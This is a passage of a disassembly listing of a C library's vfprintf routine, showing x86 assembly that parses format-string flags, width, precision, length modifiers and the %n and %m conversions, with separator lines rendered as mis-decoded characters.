test esi, esi ; case 0x6e jz short loc_8050D48 add [ebp+arg_8], 4 mov edi, [ebp+arg_8] mov eax, [edi-4] mov ecx, [ebp+var_464] xor ebx, ebx mov [ebp+var_4E0], ecx mov [ebp+var_4DC], ebx mov ebx, [ebp+var_4E0] mov [eax], ebx mov ebx, [ebp+var_4DC] mov [eax+4], ebx jmp short loc_8050DC4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050D48: ; CODE XREF: vfprintf+148Aj cmp [ebp+var_484], 0 jz short loc_8050D68 add [ebp+arg_8], 4 mov edi, [ebp+arg_8] mov edx, [edi-4] mov ecx, [ebp+var_464] mov [edx], ecx jmp short loc_8050DC4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050D68: ; CODE XREF: vfprintf+14C7j cmp [ebp+var_480], 0 jnz short loc_8050D88 add [ebp+arg_8], 4 mov ebx, [ebp+arg_8] mov edx, [ebx-4] mov edi, [ebp+var_464] mov [edx], edi jmp short loc_8050DC4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050D88: ; CODE XREF: vfprintf+14E7j add [ebp+arg_8], 4 mov ecx, [ebp+arg_8] mov edx, [ecx-4] mov bx, word ptr [ebp+var_464] mov [edx], bx jmp short loc_8050DC4 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050DA0: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ... push 3E8h ; case 0x6d lea edx, [ebp+var_3E8] push edx mov edx, __errno push edx call sub_8056E14 mov esi, eax add esp, 0Ch jmp loc_8050B3E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050DC4: ; CODE XREF: vfprintf+C12j ; vfprintf+11EEj ... 
inc [ebp+var_400] mov esi, [ebp+var_400] mov [ebp+var_4F0], esi cmp byte ptr [esi], 0 jz short loc_8050E19 nop loc_8050DDC: ; CODE XREF: vfprintf+158Fj mov edi, [ebp+var_4F0] cmp byte ptr [edi], 25h jz short loc_8050E19 cmp byte ptr [edi], 0 jge short loc_8050DFD push 1 push edi push 0 call sub_805602C add esp, 0Ch test eax, eax jg short loc_8050E08 loc_8050DFD: ; CODE XREF: vfprintf+1562j inc [ebp+var_4F0] jmp short loc_8050E0E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050E08: ; CODE XREF: vfprintf+1573j add [ebp+var_4F0], eax loc_8050E0E: ; CODE XREF: vfprintf+157Bj mov ecx, [ebp+var_4F0] cmp byte ptr [ecx], 0 jnz short loc_8050DDC loc_8050E19: ; CODE XREF: vfprintf+1551j ; vfprintf+155Dj mov ebx, [ebp+var_4F0] mov [ebp+var_400], ebx mov edi, [ebp+arg_0] mov edi, [edi+50h] mov edx, [ebp+var_400] sub edx, esi push edx push esi mov ecx, [ebp+arg_0] push ecx mov edx, [edi+34h] call edx mov edx, [ebp+var_400] sub edx, esi add esp, 0Ch cmp eax, edx jnz short loc_8050E72 ; case 0x0 add [ebp+var_464], eax mov edx, [ebp+var_400] cmp byte ptr [edx], 0 jnz loc_804F9AC jmp loc_80529B8 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8050E68: ; CODE XREF: vfprintf+13j vfprintf+2Aj ... mov __errno, 16h loc_8050E72: ; CODE XREF: vfprintf+EAj ; vfprintf+1ABj ... mov eax, 0FFFFFFFFh ; case 0x0 jmp loc_80529BE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050E7C: ; CODE XREF: vfprintf+1A5j ; vfprintf+1ABj ... 
mov [ebp+var_4A8], 20h ; default add esp, 0FFFFF500h mov [ebp+var_4AC], esp mov [ebp+var_4A4], 0 mov [ebp+var_4B0], 0 mov [ebp+var_43C], 0 cmp [ebp+var_458], 0FFFFFFFFh jnz short loc_8050F38 mov edx, dword_8078890 mov edx, [edx+10h] mov [ebp+var_4E0], edx xor al, al mov esi, [ebp+var_4E0] mov edi, esi cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx dec edx push edx mov ecx, [ebp+var_4E0] push ecx lea edx, [ebp+var_3F8] push edx call sub_805602C add esp, 0Ch test eax, eax jg short loc_8050F0C mov edx, dword_8078890 mov edx, [edx+10h] movzx edx, byte ptr [edx] mov [ebp+var_3F8], edx loc_8050F0C: ; CODE XREF: vfprintf+1670j mov edx, dword_8078890 mov edx, [edx+14h] mov [ebp+var_458], edx cmp byte ptr [edx], 0 jz short loc_8050F2E cmp byte ptr [edx], 0FFh jz short loc_8050F2E cmp [ebp+var_3F8], 0 jnz short loc_8050F38 loc_8050F2E: ; CODE XREF: vfprintf+1696j ; vfprintf+169Bj mov [ebp+var_458], 0 loc_8050F38: ; CODE XREF: vfprintf+162Fj ; vfprintf+16A4j mov ebx, [ebp+var_45C] mov [ebp+var_400], ebx cmp byte ptr [ebx], 0 jz loc_805190C mov edi, [ebp+var_4A4] lea edx, [edi+edi*4] lea edx, [edi+edx*2] shl edx, 3 mov [ebp+var_4D4], edx lea esi, [esi] loc_8050F64: ; CODE XREF: vfprintf+207Ej mov ecx, [ebp+var_4A8] cmp [ebp+var_4A4], ecx jb short loc_8050FDE mov esi, [ebp+var_4AC] add ecx, ecx mov [ebp+var_4A8], ecx lea edx, [ecx+ecx*4] lea edx, [ecx+edx*2] shl edx, 3 sub esp, edx mov [ebp+var_4AC], esp mov edx, [ebp+var_4D4] add edx, esi cmp esp, edx jnz short loc_8050FAC mov edx, ecx shr edx, 1 add ecx, edx mov [ebp+var_4A8], ecx jmp short loc_8050FDE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8050FAC: ; CODE XREF: vfprintf+1713j mov ebx, [ebp+var_4D4] push ebx push esi mov edi, [ebp+var_4AC] push edi call memcpy add esp, 0Ch mov edx, [ebp+var_4AC] add edx, ebx cmp esi, edx jnz short loc_8050FDE mov edx, [ebp+var_4A8] shr edx, 1 add [ebp+var_4A8], edx loc_8050FDE: ; CODE XREF: vfprintf+16E8j ; vfprintf+1722j ... 
mov ecx, [ebp+var_4B0] mov [ebp+var_4B8], ecx mov esi, [ebp+var_4D4] add esi, [ebp+var_4AC] mov edx, [ebp+var_400] mov [ebp+var_450], edx mov [ebp+var_4BC], 0 inc [ebp+var_450] mov dword ptr [esi+40h], 0FFFFFFFFh mov dword ptr [esi+18h], 0 mov dword ptr [esi+1Ch], 0 mov dword ptr [esi+20h], 0 mov dword ptr [esi+24h], 0 mov dword ptr [esi+28h], 0 mov byte ptr [esi+2Ch], 20h mov edx, [ebp+var_450] movzx eax, byte ptr [edx] mov ebx, dword_8078FA0 mov [ebp+var_4F0], ebx test byte ptr [ebx+eax*2+1], 8 jz loc_80511BB ; default mov [ebp+var_4C0], edx lea edi, [ebp+var_450] mov [ebp+var_4EC], edi add eax, 0FFFFFFD0h inc [ebp+var_450] mov edx, [ebp+var_450] movzx edx, byte ptr [edx] test byte ptr [ebx+edx*2+1], 8 jz short loc_80510CC nop loc_805108C: ; CODE XREF: vfprintf+1842j lea edx, [eax+eax*8] lea edx, [edx+eax-30h] mov [ebp+var_4E0], edx mov ecx, [ebp+var_4EC] mov edx, [ecx] movzx edx, byte ptr [edx] mov eax, [ebp+var_4E0] add eax, edx inc dword ptr [ecx] mov edx, [ecx] movzx edx, byte ptr [edx] mov [ebp+var_4E0], edx mov edx, dword_8078FA0 mov ebx, [ebp+var_4E0] test byte ptr [edx+ebx*2+1], 8 jnz short loc_805108C loc_80510CC: ; CODE XREF: vfprintf+1801j test eax, eax jz short loc_8051100 mov edx, [ebp+var_450] cmp byte ptr [edx], 24h jnz short loc_8051100 inc [ebp+var_450] lea edi, [eax-1] mov [esi+40h], edi mov edx, [ebp+var_43C] cmp edx, eax jnb short loc_80510F3 mov edx, eax loc_80510F3: ; CODE XREF: vfprintf+1867j mov [ebp+var_43C], edx jmp loc_80511BB ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051100: ; CODE XREF: vfprintf+1846j ; vfprintf+1851j mov ecx, [ebp+var_4C0] mov [ebp+var_450], ecx jmp loc_80511BB ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051114: ; CODE XREF: vfprintf+193Cj ; vfprintf+1945j ... 
mov edx, [ebp+var_450] movzx edx, byte ptr [edx] add edx, 0FFFFFFE0h inc [ebp+var_450] cmp edx, 10h ; switch 17 cases ja loc_80511BB ; default jmp ds:off_8051138[edx*4] ; switch jump ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h off_8051138 dd offset loc_805117C, 2 dup(offset loc_80511BB), offset loc_80511A0 ; DATA XREF: vfprintf+18A7r dd 3 dup(offset loc_80511BB), offset loc_80511B4, 3 dup(offset loc_80511BB) ; jump table for switch statement dd offset loc_8051188, offset loc_80511BB, offset loc_8051194 dd 2 dup(offset loc_80511BB), offset loc_80511AC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805117C: ; CODE XREF: vfprintf+18A7j ; DATA XREF: vfprintf+18B0o mov dword ptr [esi+1Ch], 1 ; case 0x0 jmp short loc_80511BB ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051188: ; CODE XREF: vfprintf+18A7j ; DATA XREF: vfprintf+18B0o mov dword ptr [esi+24h], 1 ; case 0xb jmp short loc_80511BB ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051194: ; CODE XREF: vfprintf+18A7j ; DATA XREF: vfprintf+18B0o mov dword ptr [esi+20h], 1 ; case 0xd jmp short loc_80511BB ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80511A0: ; CODE XREF: vfprintf+18A7j ; DATA XREF: vfprintf+18B0o mov dword ptr [esi+18h], 1 ; case 0x3 jmp short loc_80511BB ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80511AC: ; CODE XREF: vfprintf+18A7j ; DATA XREF: vfprintf+18B0o mov byte ptr [esi+2Ch], 30h ; case 0x10 jmp short loc_80511BB ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80511B4: ; CODE XREF: vfprintf+18A7j ; DATA XREF: vfprintf+18B0o mov dword ptr [esi+28h], 1 ; case 0x7 loc_80511BB: ; CODE XREF: vfprintf+17D2j ; vfprintf+1871j ... 
mov edx, [ebp+var_450] ; default cmp byte ptr [edx], 20h jz loc_8051114 cmp byte ptr [edx], 2Bh jz loc_8051114 cmp byte ptr [edx], 2Dh jz loc_8051114 cmp byte ptr [edx], 23h jz loc_8051114 cmp byte ptr [edx], 30h jz loc_8051114 cmp byte ptr [edx], 27h jz loc_8051114 cmp dword ptr [esi+20h], 0 jz short loc_8051201 mov byte ptr [esi+2Ch], 20h loc_8051201: ; CODE XREF: vfprintf+1973j mov dword ptr [esi+3Ch], 0FFFFFFFFh mov dword ptr [esi+4], 0 mov edx, [ebp+var_450] cmp byte ptr [edx], 2Ah jnz loc_8051310 inc [ebp+var_450] mov ebx, [ebp+var_450] mov [ebp+var_4F0], ebx movzx edx, byte ptr [ebx] mov edi, dword_8078FA0 mov [ebp+var_4E0], edi test byte ptr [edi+edx*2+1], 8 jz loc_80512DD lea ecx, [ebp+var_450] mov [ebp+var_4EC], ecx lea eax, [edx-30h] inc [ebp+var_450] mov edx, [ebp+var_450] movzx edx, byte ptr [edx] test byte ptr [edi+edx*2+1], 8 jz short loc_80512B0 nop loc_8051270: ; CODE XREF: vfprintf+1A26j lea edx, [eax+eax*8] lea edx, [edx+eax-30h] mov [ebp+var_4E0], edx mov ebx, [ebp+var_4EC] mov edx, [ebx] movzx edx, byte ptr [edx] mov eax, [ebp+var_4E0] add eax, edx inc dword ptr [ebx] mov edx, [ebx] movzx edx, byte ptr [edx] mov [ebp+var_4E0], edx mov edx, dword_8078FA0 mov edi, [ebp+var_4E0] test byte ptr [edx+edi*2+1], 8 jnz short loc_8051270 loc_80512B0: ; CODE XREF: vfprintf+19E5j test eax, eax jz short loc_80512DD mov edx, [ebp+var_450] cmp byte ptr [edx], 24h jnz short loc_80512DD lea ecx, [eax-1] mov [esi+3Ch], ecx mov edx, [ebp+var_43C] cmp edx, eax jnb short loc_80512D1 mov edx, eax loc_80512D1: ; CODE XREF: vfprintf+1A45j mov [ebp+var_43C], edx inc [ebp+var_450] loc_80512DD: ; CODE XREF: vfprintf+19BCj ; vfprintf+1A2Aj ... 
cmp dword ptr [esi+3Ch], 0 jge loc_8051397 mov ebx, [ebp+var_4B8] mov [esi+3Ch], ebx inc ebx mov [ebp+var_4B8], ebx inc [ebp+var_4BC] mov edi, [ebp+var_4F0] mov [ebp+var_450], edi jmp loc_8051397 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051310: ; CODE XREF: vfprintf+1990j mov edx, [ebp+var_450] movzx edx, byte ptr [edx] mov ecx, dword_8078FA0 mov [ebp+var_4F0], ecx test byte ptr [ecx+edx*2+1], 8 jz short loc_8051397 lea ebx, [ebp+var_450] mov [ebp+var_4EC], ebx lea eax, [edx-30h] inc [ebp+var_450] mov edx, [ebp+var_450] movzx edx, byte ptr [edx] test byte ptr [ecx+edx*2+1], 8 jz short loc_8051394 db 8Dh,76h,0 ; lea esi, [esi+0] loc_8051354: ; CODE XREF: vfprintf+1B0Aj lea edx, [eax+eax*8] lea edx, [edx+eax-30h] mov [ebp+var_4E0], edx mov edi, [ebp+var_4EC] mov edx, [edi] movzx edx, byte ptr [edx] mov eax, [ebp+var_4E0] add eax, edx inc dword ptr [edi] mov edx, [edi] movzx edx, byte ptr [edx] mov [ebp+var_4E0], edx mov edx, dword_8078FA0 mov ecx, [ebp+var_4E0] test byte ptr [edx+ecx*2+1], 8 jnz short loc_8051354 loc_8051394: ; CODE XREF: vfprintf+1AC7j mov [esi+4], eax loc_8051397: ; CODE XREF: vfprintf+1A59j ; vfprintf+1A81j ... 
mov dword ptr [esi+38h], 0FFFFFFFFh mov dword ptr [esi], 0FFFFFFFFh mov edx, [ebp+var_450] cmp byte ptr [edx], 2Eh jnz loc_805154A inc [ebp+var_450] mov edx, [ebp+var_450] cmp byte ptr [edx], 2Ah jnz loc_80514BC inc [ebp+var_450] mov ebx, [ebp+var_450] mov [ebp+var_4F0], ebx movzx edx, byte ptr [ebx] mov edi, dword_8078FA0 mov [ebp+var_4E0], edi test byte ptr [edi+edx*2+1], 8 jz loc_8051489 lea ecx, [ebp+var_450] mov [ebp+var_4EC], ecx lea eax, [edx-30h] inc [ebp+var_450] mov edx, [ebp+var_450] movzx edx, byte ptr [edx] test byte ptr [edi+edx*2+1], 8 jz short loc_805145C db 8Dh,76h,0 ; lea esi, [esi+0] loc_805141C: ; CODE XREF: vfprintf+1BD2j lea edx, [eax+eax*8] lea edx, [edx+eax-30h] mov [ebp+var_4E0], edx mov ebx, [ebp+var_4EC] mov edx, [ebx] movzx edx, byte ptr [edx] mov eax, [ebp+var_4E0] add eax, edx inc dword ptr [ebx] mov edx, [ebx] movzx edx, byte ptr [edx] mov [ebp+var_4E0], edx mov edx, dword_8078FA0 mov edi, [ebp+var_4E0] test byte ptr [edx+edi*2+1], 8 jnz short loc_805141C loc_805145C: ; CODE XREF: vfprintf+1B8Fj test eax, eax jz short loc_8051489 mov edx, [ebp+var_450] cmp byte ptr [edx], 24h jnz short loc_8051489 lea ecx, [eax-1] mov [esi+38h], ecx mov edx, [ebp+var_43C] cmp edx, eax jnb short loc_805147D mov edx, eax loc_805147D: ; CODE XREF: vfprintf+1BF1j mov [ebp+var_43C], edx inc [ebp+var_450] loc_8051489: ; CODE XREF: vfprintf+1B66j ; vfprintf+1BD6j ... 
cmp dword ptr [esi+38h], 0 jge loc_805154A mov ebx, [ebp+var_4B8] mov [esi+38h], ebx inc ebx mov [ebp+var_4B8], ebx inc [ebp+var_4BC] mov edi, [ebp+var_4F0] mov [ebp+var_450], edi jmp loc_805154A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80514BC: ; CODE XREF: vfprintf+1B3Aj mov edx, [ebp+var_450] movzx edx, byte ptr [edx] mov ecx, dword_8078FA0 mov [ebp+var_4F0], ecx test byte ptr [ecx+edx*2+1], 8 jz short loc_8051544 lea ebx, [ebp+var_450] mov [ebp+var_4EC], ebx lea eax, [edx-30h] inc [ebp+var_450] mov edx, [ebp+var_450] movzx edx, byte ptr [edx] test byte ptr [ecx+edx*2+1], 8 jz short loc_8051540 db 8Dh,76h,0 ; lea esi, [esi+0] loc_8051500: ; CODE XREF: vfprintf+1CB6j lea edx, [eax+eax*8] lea edx, [edx+eax-30h] mov [ebp+var_4E0], edx mov edi, [ebp+var_4EC] mov edx, [edi] movzx edx, byte ptr [edx] mov eax, [ebp+var_4E0] add eax, edx inc dword ptr [edi] mov edx, [edi] movzx edx, byte ptr [edx] mov [ebp+var_4E0], edx mov edx, dword_8078FA0 mov ecx, [ebp+var_4E0] test byte ptr [edx+ecx*2+1], 8 jnz short loc_8051500 loc_8051540: ; CODE XREF: vfprintf+1C73j mov [esi], eax jmp short loc_805154A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051544: ; CODE XREF: vfprintf+1C4Ej mov dword ptr [esi], 0 loc_805154A: ; CODE XREF: vfprintf+1B25j ; vfprintf+1C05j ... mov dword ptr [esi+0Ch], 0 mov dword ptr [esi+10h], 0 mov dword ptr [esi+14h], 0 jmp loc_8051653 ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051564: ; CODE XREF: vfprintf+1DD4j ; vfprintf+1DDDj ... 
mov edx, [ebp+var_450] movzx edx, byte ptr [edx] add edx, 0FFFFFFB4h inc [ebp+var_450] cmp edx, 25h ; switch 38 cases ja loc_8051653 ; default jmp ds:off_8051588[edx*4] ; switch jump ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h off_8051588 dd offset loc_805164C, 0Dh dup(offset loc_8051653), offset loc_805163C ; DATA XREF: vfprintf+1CF7r dd 0Dh dup(offset loc_8051653), offset loc_8051620, 3 dup(offset loc_8051653) ; jump table for switch statement dd offset loc_805162C, 4 dup(offset loc_8051653), offset loc_805164C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051620: ; CODE XREF: vfprintf+1CF7j ; DATA XREF: vfprintf+1D00o mov dword ptr [esi+10h], 1 ; case 0x1c jmp short loc_8051653 ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805162C: ; CODE XREF: vfprintf+1CF7j ; DATA XREF: vfprintf+1D00o cmp dword ptr [esi+14h], 0 ; case 0x20 jnz short loc_805164C ; case 0x0 mov dword ptr [esi+14h], 1 jmp short loc_8051653 ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_805163C: ; CODE XREF: vfprintf+1CF7j ; DATA XREF: vfprintf+1D00o mov dword ptr [esi+0Ch], 0 ; case 0xe mov dword ptr [esi+14h], 0 jmp short loc_8051653 ; default ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805164C: ; CODE XREF: vfprintf+1CF7j ; vfprintf+1DA8j ; DATA XREF: ... mov dword ptr [esi+0Ch], 1 ; case 0x0 loc_8051653: ; CODE XREF: vfprintf+1CD7j ; vfprintf+1CF1j ... 
mov edx, [ebp+var_450] ; default cmp byte ptr [edx], 68h jz loc_8051564 cmp byte ptr [edx], 6Ch jz loc_8051564 cmp byte ptr [edx], 4Ch jz loc_8051564 cmp byte ptr [edx], 5Ah jz loc_8051564 cmp byte ptr [edx], 71h jz loc_8051564 mov edx, [ebp+var_450] mov dl, [edx] mov [esi+8], dl inc [ebp+var_450] movzx eax, byte ptr [esi+8] cmp ds:dword_807E78C[eax*4], 0 jz short loc_80516C0 lea edx, [esi+44h] push edx push 1 push esi mov edx, ds:dword_807E78C[eax*4] call edx mov [esi+48h], eax add esp, 0Ch jmp loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80516C0: ; CODE XREF: vfprintf+1E1Bj mov dword ptr [esi+48h], 1 movzx edx, byte ptr [esi+8] add edx, 0FFFFFFBBh ; switch 52 cases cmp edx, 33h ja loc_805183C ; default jmp ds:off_80516E0[edx*4] ; switch jump ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h off_80516E0 dd offset loc_80517F0, offset loc_805183C, offset loc_80517F0 ; DATA XREF: vfprintf+1E4Fr dd 10h dup(offset loc_805183C), offset loc_80517B0, 0Ah dup(offset loc_805183C) ; jump table for switch statement dd offset loc_805180C, offset loc_80517B0, 3 dup(offset loc_80517F0) dd offset loc_805183C, offset loc_80517B0, 4 dup(offset loc_805183C) dd offset loc_8051830, offset loc_80517B0, offset loc_8051824 dd 2 dup(offset loc_805183C), offset loc_8051818, offset loc_805183C dd offset loc_80517B0, 2 dup(offset loc_805183C), offset loc_80517B0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80517B0: ; CODE XREF: vfprintf+1E4Fj ; DATA XREF: vfprintf+1E58o cmp dword ptr [esi+0Ch], 0 ; case 0x58 jz short loc_80517C4 mov dword ptr [esi+44h], 100h jmp loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80517C4: ; CODE XREF: vfprintf+1F2Cj cmp dword ptr [esi+14h], 0 jz short loc_80517D4 mov dword ptr [esi+44h], 200h jmp short loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80517D4: ; CODE XREF: vfprintf+1F40j cmp dword ptr [esi+10h], 0 jz short loc_80517E4 mov dword ptr [esi+44h], 400h jmp short 
loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80517E4: ; CODE XREF: vfprintf+1F50j mov dword ptr [esi+44h], 0 jmp short loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80517F0: ; CODE XREF: vfprintf+1E4Fj ; DATA XREF: vfprintf+1E58o cmp dword ptr [esi+0Ch], 0 ; case 0x45 jz short loc_8051800 mov dword ptr [esi+44h], 105h jmp short loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8051800: ; CODE XREF: vfprintf+1F6Cj mov dword ptr [esi+44h], 5 jmp short loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805180C: ; CODE XREF: vfprintf+1E4Fj ; DATA XREF: vfprintf+1E58o mov dword ptr [esi+44h], 1 ; case 0x63 jmp short loc_8051843 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8051818: ; CODE XREF: vfprintf+1E4Fj ; DATA XREF: vfprintf+1E58o mov dword ptr [esi+44h], 2 ; case 0x73 jmp short loc_8051843 ; 